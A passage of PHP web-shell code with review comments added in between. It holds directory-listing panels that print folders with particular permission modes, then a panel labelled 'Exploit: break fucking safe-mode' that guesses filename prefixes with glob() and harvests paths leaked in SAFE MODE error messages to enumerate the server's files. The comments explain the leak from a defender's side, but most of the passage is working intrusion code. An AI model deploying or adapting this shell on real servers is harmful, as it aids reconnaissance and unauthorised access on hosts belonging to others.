  1291.  
  1292. if ((is_dir($full_path)) && ($perms == '0705'))
  1293. {
  1294. if (!file_exists('.*')) {
  1295.  
  1296. $_folders[$i] = $file1;
  1297.  
  1298. $i++;
  1299. }
  1300. }
  1301. }
  1302.  
  1303.  
  1304.  
  1305. clearstatcache();
  1306.  
  1307.  
  1308.  
  1309. echo '</FONT><strong><FONT COLOR=#336699>The folders is 705 :</strong><br />';
  1310.  
  1311. foreach ($_folders as $folder)
  1312. {
  1313. echo $folder.'<br />';
  1314. }
  1315. //////////
  // Pass 7: mode 0606.
  1316. $handle = opendir($path);
  1317.  
  1318. $_folders = array();
  1319.  
  1320. $i = 0;
  1321.  
  1322. while (false !== ($file1 = readdir($handle)))
  1323. {
  1324. $full_path = "$path/$file1";
  1325. $perms = substr(sprintf('%o', fileperms($full_path)), -4);
  1326.  
  1327. if ((is_dir($full_path)) && ($perms == '0606'))
  1328. {
  1329. if (!file_exists('.*')) {
  1330.  
  1331. $_folders[$i] = $file1;
  1332.  
  1333. $i++;
  1334. }
  1335. }
  1336. }
  1337.  
  1338.  
  1339.  
  1340. clearstatcache();
  1341.  
  1342.  
  1343.  
  1344. echo '</FONT><strong><FONT COLOR=#996666>The folders is 606 :</strong><br />';
  1345.  
  1346. foreach ($_folders as $folder)
  1347. {
  1348. echo $folder.'<br />';
  1349. }
  1350. //////////
  // Pass 8: mode 0703.
  1351. $handle = opendir($path);
  1352.  
  1353. $_folders = array();
  1354.  
  1355. $i = 0;
  1356.  
  1357. while (false !== ($file1 = readdir($handle)))
  1358. {
  1359. $full_path = "$path/$file1";
  1360. $perms = substr(sprintf('%o', fileperms($full_path)), -4);
  1361.  
  1362. if ((is_dir($full_path)) && ($perms == '0703'))
  1363. {
  1364. if (!file_exists('.*')) {
  1365.  
  1366. $_folders[$i] = $file1;
  1367.  
  1368. $i++;
  1369. }
  1370. }
  1371. }
  1372.  
  1373.  
  1374.  
  1375. clearstatcache();
  1376.  
  1377.  
  1378.  
  1379. echo '</FONT><strong><FONT COLOR=#3333FF>The folders is 703 :</strong><br />';
  1380.  
  1381. foreach ($_folders as $folder)
  1382. {
  1383. echo $folder.'<br />';
  1384. }
  1385.  
  1386.  
  1387.  
  1388. }
  // Final listing of the "Open dir" panel: every entry of $path, files and directories alike,
  // followed by the entry count.
  // Review notes:
  //  - This run sits after the closing brace of the if/else above, so it executes on every
  //    request. In the visible code $path is only assigned when POST "m" is present;
  //    otherwise opendir() receives whatever $path held before (presumably unset).
  //  - $perms is computed for each entry but not used here.
  //  - The handle is not closed and entry names are printed without HTML escaping.
  1389. $handle = opendir($path);
  1390.  
  1391. $_folders = array();
  1392.  
  1393. $i = 0;
  1394.  
  1395. while (false !== ($file1 = readdir($handle)))
  1396. {
  1397. $full_path = "$path/$file1";
  1398. $perms = substr(sprintf('%o', fileperms($full_path)), -4);
  1399.  
  1400.  
  1401.  
  1402.  
  1403. $_folders[$i] = $file1;
  1404.  
  1405. $i++;
  1406.  
  1407.  
  1408. }
  1409.  
  1410.  
  1411.  
  1412. clearstatcache();
  1413.  
  1414.  
  1415.  
  1416. echo '</FONT><strong><FONT COLOR=#FFFF00>The folders and file all :</strong><br />';
  1417.  
  1418. foreach ($_folders as $folder)
  1419. {
  1420. echo $folder.'<br />';
  1421. }
  1422.  
  1423. echo '</FONT><strong><FONT COLOR=#FF0000>The total : </strong>'.$i.'</FONT><br />';
  1424. $tb->tdbody ("</td></tr></table>");
  1425.  
  // "safe-mode" panel. It enumerates names under the directory given in POST "root" (default
  // "/") without any successful directory read: glob() is called on prefixes of one to four
  // characters, and eh(), installed below as the error handler, collects the path that the
  // SAFE MODE restriction warning discloses. The collected paths are de-duplicated and
  // printed one per line.
  // Review notes (defender view):
  //  - The underlying issue is an information leak through error text: a denial message that
  //    names the denied object confirms that the object exists.
  //  - It depends on safe_mode, which was removed in PHP 5.4; when safe_mode is off the script
  //    dies at the ini_get() check, before the <textarea> and the closing table are written.
  //  - error_reporting() and display_errors are changed for the rest of the request.
  //  - $_POST['root'] is echoed into the value attribute without escaping.
  //  - $D[count($D)-1] reads index -1 while $D is still empty.
  1426. $tb->tableheader();
  1427. $tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>Exploit: break fucking safe-mode </b></td></tr></table>','center','top');
  1428. $tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>');
  1429.  
  1430.  
  1431. error_reporting(E_WARNING);
  1432. ini_set("display_errors", 1);
  1433.  
  1434. echo "<head><title>".getcwd()."</title></head>";
  1435.  
  1436. echo "<form method=POST>";
  1437. echo "<div style='float: left'><FONT COLOR=\"RED\">Root directory: </FONT><input type=text name=root value='{$_POST['root']}'></div>";
  1438. echo "<input type=submit value='--&raquo;'></form>";
  1439.  
  1440.  
  1441.  
  1442. // break fucking safe-mode !
  1443.  
  1444. $root = "/";
  1445.  
  1446. if($_POST['root']) $root = $_POST['root'];
  1447.  
  1448. if (!ini_get('safe_mode')) die("<font size=-2 face=verdana color='#CC0000'>Safe-mode is OFF.</font>");
  1449. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  // $D collects the disclosed paths, $c is the next free index in $D; eh() writes both.
  1450. $c = 0; $D = array();
  1451. set_error_handler("eh");
  1452.  
  1453. $chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
  1454.  
  // Each level extends the prefix by one character and descends only when the previous
  // glob() call made the last element of $D change, i.e. the handler recorded a new path.
  1455. for($i=0; $i < strlen($chars); $i++){
  1456. $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}";
  1457.  
  1458. $prevD = $D[count($D)-1];
  1459. glob($path."*");
  1460.  
  1461. if($D[count($D)-1] != $prevD){
  1462.  
  1463. for($j=0; $j < strlen($chars); $j++){
  1464.  
  1465. $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}";
  1466.  
  1467. $prevD2 = $D[count($D)-1];
  1468. glob($path."*");
  1469.  
  1470. if($D[count($D)-1] != $prevD2){
  1471.  
  1472.  
  1473. for($p=0; $p < strlen($chars); $p++){
  1474.  
  1475. $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";
  1476.  
  1477. $prevD3 = $D[count($D)-1];
  1478. glob($path."*");
  1479.  
  1480. if($D[count($D)-1] != $prevD3){
  1481.  
  1482.  
  1483. for($r=0; $r < strlen($chars); $r++){
  1484.  
  1485. $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
  1486. glob($path."*");
  1487.  
  1488. }
  1489.  
  1490. }
  1491.  
  1492. }
  1493.  
  1494. }
  1495.  
  1496. }
  1497.  
  1498. }
  1499.  
  1500. }
  1501.  
  1502. $D = array_unique($D);
  1503.  
  1504.  
  1505. foreach($D as $item) echo "{$item}\n";
  1506.  
  1507.  
  1508.  
  1509.  
  1510.  
  // Error handler installed by set_error_handler("eh") above. It matches the SAFE MODE
  // restriction message and stores capture group 2, the text between "is not allowed to
  // access" and "owned by uid", in the global $D at index $c. It returns nothing, and
  // messages that do not match are dropped.
  1511. function eh($errno, $errstr, $errfile, $errline){
  1512.  
  1513. global $D, $c, $i;
  1514. preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o);
  1515. if($o){ $D[$c] = $o[2]; $c++;}
  1516.  
  1517. }
  1518. echo "</textarea>";
  1519. $tb->tdbody ("</td></tr></table>");